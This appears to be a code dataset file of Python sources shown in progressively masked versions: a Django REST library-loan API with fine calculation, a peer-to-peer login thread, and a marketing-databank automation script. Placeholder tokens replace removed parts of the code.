permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n"
] | false |
99,826 | 47ef00cb40d44d779ed8ce3ac88f9b2738a9438e | import socket
import sys
import Util
import threading as th
from dataBase import dataBase
from plot_net import plot_net
from matplotlib.pyplot import pause
class t_login(th.Thread):
def __init__(self,other_peersocket, packet):
th.Thread.__init__(self)
self.other_peersocket = other_peersocket
self.packet = packet
def run(self):
db = dataBase()
ip = self.packet[:55]
port = self.packet[55:]
sid = db.login(ip, port)
packet = "ALGI" + str(sid)
self.other_peersocket.send(packet.encode())
self.other_peersocket.close() | [
"import socket\nimport sys\nimport Util\nimport threading as th\nfrom dataBase import dataBase\nfrom plot_net import plot_net\nfrom matplotlib.pyplot import pause\n\nclass t_login(th.Thread):\n\tdef __init__(self,other_peersocket, packet):\n\t\tth.Thread.__init__(self)\n\t\tself.other_peersocket = other_peersocket\n\t\tself.packet = packet\n\n\tdef run(self):\n\t\tdb = dataBase()\n\n\t\tip = self.packet[:55]\n\t\tport = self.packet[55:]\n\t\t\n\t\tsid = db.login(ip, port)\n\n\t\tpacket = \"ALGI\" + str(sid)\n\t\tself.other_peersocket.send(packet.encode())\n\t\tself.other_peersocket.close()",
"import socket\nimport sys\nimport Util\nimport threading as th\nfrom dataBase import dataBase\nfrom plot_net import plot_net\nfrom matplotlib.pyplot import pause\n\n\nclass t_login(th.Thread):\n\n def __init__(self, other_peersocket, packet):\n th.Thread.__init__(self)\n self.other_peersocket = other_peersocket\n self.packet = packet\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n\n def __init__(self, other_peersocket, packet):\n th.Thread.__init__(self)\n self.other_peersocket = other_peersocket\n self.packet = packet\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n <function token>\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,827 | 5e8bf23dcd7317545547604b98e78fe782be1311 | from ADB import set_pause, AutoDatabank
from ADB import t180, t365, somedays
from datetime import datetime, timedelta
set_pause(0.25,0.35)
xx = AutoDatabank(2, False, 'dp')
xx.brand_name = 'ASICS'
xx.zszw_order = 2
ts = '2018-10-20'
te = '2018-11-11'
tb = '2018-10-19'
def xinke_and_laoke_baoguang(people_type):
if people_type == 'xinke':
namess = '新客'
jbc = 3
elif people_type == 'laoke':
namess = '老客'
jbc = 1
xx.cp()
xx.qll(34, tb, tb) # xx.zdy('历史老客YJA')
xx.zszw([1, 99], ts, te, jbc)
xx.sp(namess + '--全部曝光')
for i in range(1, 9, 1):
xx.cp()
xx.qll(34, tb, tb)
xx.zszw([i, i], ts, te, jbc)
xx.zszw([1, 99], ts, te, 3)
xx.sp(namess + '--全部曝光X%s' % i)
def xinke_and_laoke_YJJ(people_type):
if people_type == 'xinke':
namess = '新客'
jbc = 3
elif people_type == 'laoke':
namess = '老客'
jbc = 1
for i in range(1, 9, 1):
xx.cp()
xx.qll(1, te, te) # 以A人群作为辅助人群
xx.dp(5, ts, te, jbc=2) # xx.zdy('活动期购买YJA', jbc=2)
xx.qll(34, tb, tb, jbc=1) # xx.zdy('历史老客YJA', jbc=1)
xx.zszw([i, i], ts, te, jbc)
xx.sp(namess + '--曝光%s次' % i + '【G')
if __name__ == '__main__':
xinke_and_laoke_baoguang('xinke')
xinke_and_laoke_baoguang('laoke')
# xx.cp()
# xx.qll(1,'2019-1-20','2019-1-20')
# xx.sp('YJJ')
xinke_and_laoke_YJJ('xinke')
xinke_and_laoke_YJJ('laoke')
| [
"from ADB import set_pause, AutoDatabank\nfrom ADB import t180, t365, somedays\nfrom datetime import datetime, timedelta\n\nset_pause(0.25,0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\n\nts = '2018-10-20'\nte = '2018-11-11'\n\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n\n xx.cp()\n xx.qll(34, tb, tb) # xx.zdy('历史老客YJA')\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te) # 以A人群作为辅助人群\n xx.dp(5, ts, te, jbc=2) # xx.zdy('活动期购买YJA', jbc=2)\n xx.qll(34, tb, tb, jbc=1) # xx.zdy('历史老客YJA', jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n\n # xx.cp()\n # xx.qll(1,'2019-1-20','2019-1-20')\n # xx.sp('YJJ')\n\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"from ADB import set_pause, AutoDatabank\nfrom ADB import t180, t365, somedays\nfrom datetime import datetime, timedelta\nset_pause(0.25, 0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\nts = '2018-10-20'\nte = '2018-11-11'\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\nset_pause(0.25, 0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\nts = '2018-10-20'\nte = '2018-11-11'\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n 